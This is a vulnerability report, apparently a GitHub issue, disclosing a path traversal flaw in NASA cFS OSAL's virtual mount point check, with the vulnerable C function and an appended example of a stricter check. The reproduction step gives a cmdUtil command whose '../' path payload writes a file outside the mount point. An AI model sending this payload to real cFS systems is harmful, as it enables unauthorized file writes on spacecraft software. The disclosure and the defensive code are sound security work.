Path traversal vulnerability due to unchecked virtual mount point path #1516

@Levitiku5

Describe the bug
OS_FileSys_FindVirtMountPoint() accepts any path whose prefix matches the virtual mount point string, without validating subsequent components. This might allow an attacker to append ../ or ./ after a legitimate virtual mount prefix, making unauthorized path traversal possible.

To Reproduce
Steps to reproduce the behavior:

  1. Send a malicious command to write a file outside of the virtual mount point:
./cmdUtil --host=localhost --port=1234 --pktid=0x1888 --pktfc=6 --endian=LE --uint32=1 --uint32=20 --int64=0x40 --string="64:" --string="64:/cf/../../../data/new_file"
sending data to '192.168.1.31' (IP : 192.168.1.31); port 1234
  2. Observe the new file created outside of the virtual mount point:
ls
cf  core-cpu1  EEPROM.DAT  new_file

Expected behavior
Path traversal should not be possible in this manner for security reasons. The function should exit before path traversal occurs.

Code snips
osal/src/os/shared/src/osapi-filesys.c:

/*----------------------------------------------------------------
 *
 *  Purpose: Local helper routine, not part of OSAL API.
 *           Checks if the filesys table index matches the "virtual_mountpt" field.
 *           Function is Compatible with the Search object lookup routine
 *
 *  Returns: true if the entry matches, false if it does not match
 *
 *-----------------------------------------------------------------*/
bool OS_FileSys_FindVirtMountPoint(void *ref, const OS_object_token_t *token, const OS_common_record_t *obj)
{
    OS_filesys_internal_record_t *filesys;
    const char *                  target = (const char *)ref;
    size_t                        mplen;

    filesys = OS_OBJECT_TABLE_GET(OS_filesys_table, *token);

    if ((filesys->flags & OS_FILESYS_FLAG_IS_MOUNTED_VIRTUAL) == 0)
    {
        return false;
    }

    mplen = OS_strnlen(filesys->virtual_mountpt, sizeof(filesys->virtual_mountpt));

    /*
     * The virtual_mountpt member should be a substring of the search target.
     * If this matches a basic substring check then it may be a match
     */
    if (mplen == 0 || mplen >= sizeof(filesys->virtual_mountpt) ||
        strncmp(target, filesys->virtual_mountpt, mplen) != 0)
    {
        /* not a substring, so not a match */
        return false;
    }

    /*
     * Confirm that the substring ends at either a directory separator
     * or the end of string  (so exact mount points also match).
     *
     * For instance consider a virtual_mountpt of /mnt/abc and searching
     * for target=/mnt/abcd - this should return false in that case.
     */
    return (target[mplen] == '/' || target[mplen] == 0);
}

System observed on:

  • Hardware: All write-enabled hardware is vulnerable
  • OS: Possible on any write-enabled OS
  • Versions: cFS Aquila, OSAL main

Additional context
CVE-2025-25371
NASA cFS version Aquila Software Vulnerability Assessment

Reporter Info
Levi Shafter - 21Software
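
The gap described in this report, shown as an added example that is not OSAL code and not a fix proposed by the reporter or the project: `prefix_matches` mirrors the prefix test quoted above, and the hypothetical `virt_path_is_confined` additionally refuses any `.` or `..` component after the mount point. The mount point `/cf` is assumed from the reproduction command, and the function names are invented for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Prefix test equivalent to the check quoted in the issue. */
static bool prefix_matches(const char *target, const char *mountpt)
{
    size_t mplen = strlen(mountpt);

    if (mplen == 0 || strncmp(target, mountpt, mplen) != 0)
        return false;
    return target[mplen] == '/' || target[mplen] == '\0';
}

/* Hypothetical stricter check: also refuse "." and ".." components. */
bool virt_path_is_confined(const char *target, const char *mountpt)
{
    const char *p;

    if (!prefix_matches(target, mountpt))
        return false;

    p = target + strlen(mountpt);
    while (*p != '\0')
    {
        size_t seglen;

        while (*p == '/') /* skip separators, including repeated ones */
            ++p;
        seglen = strcspn(p, "/");
        if ((seglen == 1 && p[0] == '.') ||
            (seglen == 2 && p[0] == '.' && p[1] == '.'))
            return false;
        p += seglen;
    }
    return true;
}

int main(void)
{
    const char *bad = "/cf/../../../data/new_file"; /* path from the report */
    const char *ok  = "/cf/data/new_file";          /* constructed sample */

    printf("prefix only: bad=%d ok=%d\n", prefix_matches(bad, "/cf"), prefix_matches(ok, "/cf"));
    printf("confined:    bad=%d ok=%d\n", virt_path_is_confined(bad, "/cf"), virt_path_is_confined(ok, "/cf"));
    return 0;
}
```

This version rejects dot components outright rather than resolving them, so a path such as `/cf/a/../b` is refused even though it stays inside the mount point.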
